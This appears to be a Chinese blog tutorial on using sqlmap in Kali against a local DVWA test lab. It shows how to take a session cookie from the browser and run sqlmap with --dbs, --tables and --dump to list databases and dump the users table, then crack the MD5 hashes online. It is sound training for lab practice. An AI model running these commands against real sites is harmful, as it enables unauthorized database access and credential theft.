kali中的sqlmap的使用

SqlMap简介:sqlmap是一款自动化的sql注入测试工具,可更加简介的验证和利用sql注入漏洞,并且能对一些限制进行绕过,kali中已经集成了sqlmap。

首先搭建好我们的dvwa,进行登录


将漏洞等级调整到低级


选择SQL Injection并在输入框中输入要查询的UserId:


点击Submit提交后查询出结果并拿到url地址


下面打开kali 打开命令行界面


输入 sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 双引号中就是刚刚的url地址 ,注意,这里的ip也就是127.0.0.1需要换成你安装dvwa的主机上的ip,可使用ipconfig查询


由于dvwa是登录之后才能进行,所以需要给sqlmap一个登录凭证(cookie),证明已经登录过,不需要再进行登录操作,在刚刚dvwa页面中按F12打开开发者工具,并点击网络,没有网络选项的可点击>>找到


此时点击网页刷新按钮页面会出现刚刚url的一些请求信息


单击之后找到cookie


复制该cookie,然后再kali中刚刚输入的命令后面加上--cookie,也就是sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="你的cookie"   注意kali中不能使用ctrl+v 可使用鼠标右键再点击paste selection,输入完成之后直接回车运行


一下这些就是改注入点暴露的一些sql注入漏洞


若想查询数据库信息可在刚刚的命令后加上--dbs

sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6j8usjnm4v4i8mr3c9k9erdoqt" --dbs

回车执行查到数据库相关信息


并可使用-D选择数据库来查询表信息

sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6j8usjnm4v4i8mr3c9k9erdoqt" -D dvwa --tables


查询字段具体内容可在后面加入--dump

sqlmap -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=6j8usjnm4v4i8mr3c9k9erdoqt" -D dvwa -T users --dump


图中涉及到md5加密可在线解密

以上是kali中sqlmap的简单试用,跟windows中sqlmap的使用类似。

  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值